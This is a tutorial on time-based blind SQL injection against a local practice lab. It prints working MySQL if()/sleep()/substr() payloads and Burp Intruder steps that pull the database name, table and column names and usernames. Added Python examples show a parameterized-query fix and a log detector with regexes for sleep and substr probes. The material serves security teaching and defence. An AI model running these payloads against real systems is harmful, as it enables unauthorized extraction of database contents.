Premise for use: the page has no display position (no query result is echoed), and no SQL statement execution error messages are output.
Both correct and incorrect SQL statements return the same page. But after adding a sleep(5) condition, the page response is noticeably 5 seconds slower.
Advantage: no display position is required, and no error messages are required.
Disadvantage: slow; it takes a lot of time.
payload: and if(length(database())=8,sleep(10),1) --+
Determine the length of the current database name.
If the length of the database name is 8, the MySQL query sleeps for 10 seconds; otherwise the if() evaluates to 1 and the query returns without the delay.
Using Burp's Repeater module, the results are as follows:
For lengths 1 to 7 there is no pause, which means the page does not execute sleep(10) but takes the else branch of the if().
At length 8 there is an obvious pause, indicating that sleep(10) was executed, so the length of the current database name is 8.
The Repeater request and response are as follows:
Get the current database name.
Since a database name is generally in the range a-z and 0-9, possibly with special characters, and is not case-sensitive, proceed as in boolean-based injection: use the substr function to take the value of database() one character at a time. Note that substr starts counting from 1, unlike limit, which starts from 0.
payload: and if(substr(database(),1,1)='a',sleep(5),1)
http://www.localhost.com/exam/sql/exam0.php?id=1%27) and if(substr(database(),1,1)='a',sleep(5),1) -- +
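Why the request above is a problem for the application rather than for MySQL: the value of the id parameter is pasted into the statement text. The following is an added example (not code from the page or from the exam0.php lab); it assumes the query has the shape WHERE id=('...'), which is inferred from the 1%27) prefix in the URL, and uses an in-memory SQLite table with constructed sample rows in place of the lab's database. It shows the page's own payload reaching the engine as SQL in the concatenated version, and being rejected as a non-integer id in the parameterized version.

```python
import sqlite3

# The first payload from this page, exactly as it would arrive in the id
# parameter after URL decoding (the id=1%27) form of the request).
PAYLOAD = "1') and if(substr(database(),1,1)='a',sleep(5),1) -- +"


def make_db():
    """Constructed in-memory stand-in for the users table; the rows are sample data, not the lab's."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "Dumb"), (2, "second_user")])
    return conn


def build_vulnerable_sql(user_id):
    """The id=('...') shape is an assumption taken from the 1%27) prefix of the URL.
    Whatever the client sends becomes part of the statement text."""
    return f"SELECT id, username FROM users WHERE id=('{user_id}')"


def query_vulnerable(conn, user_id):
    """Returns (sql_text, rows, error). A non-None error shows the engine trying to
    run the injected expression instead of treating the input as an id."""
    sql = build_vulnerable_sql(user_id)
    try:
        return sql, conn.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        return sql, None, str(exc)


def query_safe(conn, user_id):
    """Hardened: validate the type, then bind the value as a parameter.
    The statement text is fixed, so the value can never change what the query does."""
    try:
        id_value = int(user_id)
    except (TypeError, ValueError):
        return []  # not an integer id: reject rather than interpolate
    return conn.execute("SELECT id, username FROM users WHERE id=?", (id_value,)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    sql, rows, err = query_vulnerable(conn, PAYLOAD)
    print("vulnerable statement:", sql)
    print("engine error:", err)
    print("safe lookup of the payload:", query_safe(conn, PAYLOAD))
    print("safe lookup of id 1:", query_safe(conn, "1"))
```

The vulnerable path fails in SQLite only because if(), database() and sleep() are MySQL functions; on the MySQL backend the same statement text would run and the timing oracle the page describes would work. The hardened path never reaches that point: the input is type-checked and bound, so the delay cannot be triggered regardless of the database engine.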
Burp Intruder brute-forcing is also used here: capture the request packet.
Get the table names.
and if(substring((select table_name from information_schema.tables where table_schema='security' limit 1,1),1,1)='r',sleep(10),1)
The steps are the same as above using Burp Suite, so I will give the results directly here.
The emails table comes out; the second table name is referers.
Get the field names.
and if(substring((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)='i',sleep(10),1)
As always, the field name id comes out first, and there should be multiple field names.
The second field is username.
Get the usernames.
and if(substring((select username from security.users limit 0,1),1,1)='D',sleep(10),1) -- 1
The steps are still the same, but note that in the Intruder attack the length range for payload 1 should be larger (at least 40), and the dictionary for payload 2 must contain not only the 26 letters but also the 10 digits plus the two characters '{' and '}'.
First username: Dumb
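The enumeration described on this page leaves a distinctive trace on the server side: many requests from one client carrying sleep() or benchmark() together with substr()/length() on a query value, and a subset of them completing seconds slower than the rest. The following detection example is added here and is not part of the original page; it parses constructed access-log lines (combined log format with the response time in milliseconds appended as a last field, which is an assumption about the log configuration), decodes each query string as the application would, and flags clients whose requests match the timing-oracle pattern.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (combined log format with the response
# time in milliseconds appended as the last field). They are not real traffic;
# the payload shapes follow the ones shown on this page.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:10:00:01 +0000] "GET /exam/sql/exam0.php?id=1 HTTP/1.1" 200 512 37
203.0.113.5 - - [10/Oct/2023:10:00:02 +0000] "GET /exam/sql/exam0.php?id=1%27)%20and%20if(length(database())=8,sleep(10),1)%20--+ HTTP/1.1" 200 512 10041
203.0.113.5 - - [10/Oct/2023:10:00:13 +0000] "GET /exam/sql/exam0.php?id=1%27)%20and%20if(substr(database(),1,1)=%27a%27,sleep(5),1)%20--+ HTTP/1.1" 200 512 39
203.0.113.5 - - [10/Oct/2023:10:00:14 +0000] "GET /exam/sql/exam0.php?id=1%27)%20and%20if(substr(database(),1,1)=%27s%27,sleep(5),1)%20--+ HTTP/1.1" 200 512 5038
198.51.100.7 - - [10/Oct/2023:10:00:15 +0000] "GET /exam/sql/exam0.php?id=2 HTTP/1.1" 200 498 41
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) (?P<ms>\d+)$'
)
# Functions that only appear in a request when someone is building a timing oracle.
TIME_FUNCS = re.compile(r'\b(sleep|benchmark)\s*\(', re.IGNORECASE)
# Functions used to read a value one character at a time (the enumeration pattern on this page).
ENUM_FUNCS = re.compile(r'\b(substr|substring|mid|length)\s*\(', re.IGNORECASE)


def parse_line(line):
    """Return the fields of one log line as a dict, or None if the line does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ms"] = int(d["ms"])
    # Decode the query string the way the application would see it.
    d["query"] = unquote_plus(urlsplit(d["target"]).query)
    return d


def analyze(log_text, slow_ms=3000):
    """Per-client counters: timing payloads, enumeration payloads, slow responses, max latency."""
    stats = defaultdict(lambda: {"time_payloads": 0, "enum_payloads": 0,
                                 "slow_requests": 0, "max_ms": 0})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        s = stats[rec["ip"]]
        if TIME_FUNCS.search(rec["query"]):
            s["time_payloads"] += 1
        if ENUM_FUNCS.search(rec["query"]):
            s["enum_payloads"] += 1
        if rec["ms"] >= slow_ms:
            s["slow_requests"] += 1
        s["max_ms"] = max(s["max_ms"], rec["ms"])
    return dict(stats)


def flagged_clients(log_text, slow_ms=3000):
    """Clients that sent a timing payload, or whose enumeration payloads coincide with slow responses."""
    out = []
    for ip, s in analyze(log_text, slow_ms).items():
        if s["time_payloads"] > 0 or (s["enum_payloads"] > 0 and s["slow_requests"] > 0):
            out.append(ip)
    return sorted(out)


if __name__ == "__main__":
    for ip, s in analyze(SAMPLE_LOG).items():
        print(ip, s)
    print("flagged:", flagged_clients(SAMPLE_LOG))
```

The slow_ms threshold should sit well above the application's normal response time; the point of the second rule is that a request which is both structured like a character-by-character probe and slow by several seconds is the else-branch/then-branch oracle from this page in action, even if the timing function itself has been obfuscated past the first regex.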